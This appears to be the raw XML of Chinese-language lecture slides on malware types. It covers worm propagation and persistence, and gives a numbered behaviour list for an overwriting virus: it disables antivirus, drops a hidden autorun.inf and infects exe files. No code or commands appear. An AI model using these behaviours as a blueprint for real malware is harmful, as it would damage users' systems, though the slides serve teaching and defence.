              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>单独个体，不感染文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>仅将自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>到系统目录下</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>通过修改系统启动项获得控制权</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>如注册表中的启动键值，系统服务，一些系统文件项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>通过网络、移动磁盘等进行传播</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>如将自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>盘中，或作为邮件附件发送出去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>……</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E0C39C7A-0F73-4B5F-B44F-1B6F605B27C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>覆盖型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98307" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB184438-623E-4F21-8AB4-B5C5578C5F2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在感染传播上无任何技术含量可言</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如小浩病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="98308" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC31D144-2272-43C8-87A6-6979E3155A50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1676400"/>
            <a:ext cx="8686800" cy="4968875"/>
            <a:chOff x="48" y="1190"/>
            <a:chExt cx="5472" cy="3130"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="98309" name="Group 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69B09CFB-79E4-4636-97AE-AA183B1AECB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="48" y="1190"/>
              <a:ext cx="5472" cy="3130"/>
              <a:chOff x="288" y="1190"/>
              <a:chExt cx="5472" cy="3130"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="98311" name="Picture 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1DB3CB3-ABE5-4561-94C1-D641A4807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190"/>
                <a:ext cx="5472" cy="3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312" name="Picture 12" descr="1162767">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CAF9D40-0DC7-48A7-B602-686C341E6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 y="1728"/>
                <a:ext cx="1680" cy="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310" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00FF78A7-04DD-4A3A-84FC-B35269DCB368}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4752" y="1200"/>
              <a:ext cx="672" cy="19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80F6C98B-79C2-4B26-BA40-78CBC228292D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>覆盖型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>小浩病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99331" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E025A92A-0D44-4ACD-B4B4-E61A03061F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="1676400"/>
            <a:ext cx="7667625"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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>病毒行为：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>将病毒本身拷贝到系统目录下，保存为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>exloroe.exe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>2   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>更改注册表，设置文件夹隐藏选项</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>3   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>让杀软不能运行</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>4   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>在盘下创建隐藏的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="2D64B3"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>autorun.inf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>和病毒体，使得用户在双           击盘符时，自动运行病毒</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>5   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>遍历目录，感染脚本文件和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>6   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>将被感染的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>文件换成病毒图标</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>7   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>记录所有被感染的文件，保存到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>c:\jilu.txt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>8   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>让激活的窗口标题显示“已中毒 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>X14o-H4o's Virus”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>9   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>使病毒以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="2D64B3"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ActiveX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>的方式启动</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>创建一个没有用的隐藏的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>进程</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>对系统重要的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>文件也进行了感染，所以系统直接不能启动。所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="2D64B3"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>activex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>启动也没有效果</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
            </a:br>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="240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74341D10-6043-42E4-BFB8-135C0E53740F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>覆盖型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>小浩病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100355" name="Picture 2" descr="https://imgsa.baidu.com/forum/w%3D580/sign=b7727c1c43a98226b8c12b2fba83b97a/cdbb8182b9014a90aab5b8d4a9773912b21bee79.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB49B58-3285-42BF-952D-35318F9FF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614488"/>
            <a:ext cx="5945187"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5F6485A4-2A84-4B96-84A8-AF52EED2530B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>覆盖型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>小浩病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101379" name="Picture 2" descr="https://imgsa.baidu.com/forum/w%3D580/sign=57accab03901213fcf334ed464e636f8/a8405fe736d12f2e638450094fc2d56284356807.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35770480-33B5-41D1-A398-EB23F41D4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916113"/>
            <a:ext cx="5832475" cy="451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EC6AB04A-B6A0-4A15-9CF6-FA889E22AD61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>覆盖型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>小浩病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102403" name="Picture 2" descr="https://imgsa.baidu.com/forum/w%3D580/sign=0699db615343fbf2c52ca62b807fca1e/40bfbb7eca806538cc125a7a97dda144ac348208.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5F5F3D2-A5A1-4696-9461-442ADC8751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068638"/>
            <a:ext cx="69627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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9F277BD-6543-4291-A392-690BC4C2F209}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络蠕虫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103427" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6EDAEDE-FC0F-429C-BB65-72DA4F289851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蠕虫：一段能够进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自我传播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、无需用户干预而可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自动触发执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的破坏性程序或代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蠕虫通常是需要利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来进行传播的，因此其传播过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无需用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来介入。</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2A18C424-5CD1-4C8C-89AD-41CA83F28530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中华人民共和国刑法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E6E462-EE4C-45E0-A557-89B90CD59645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
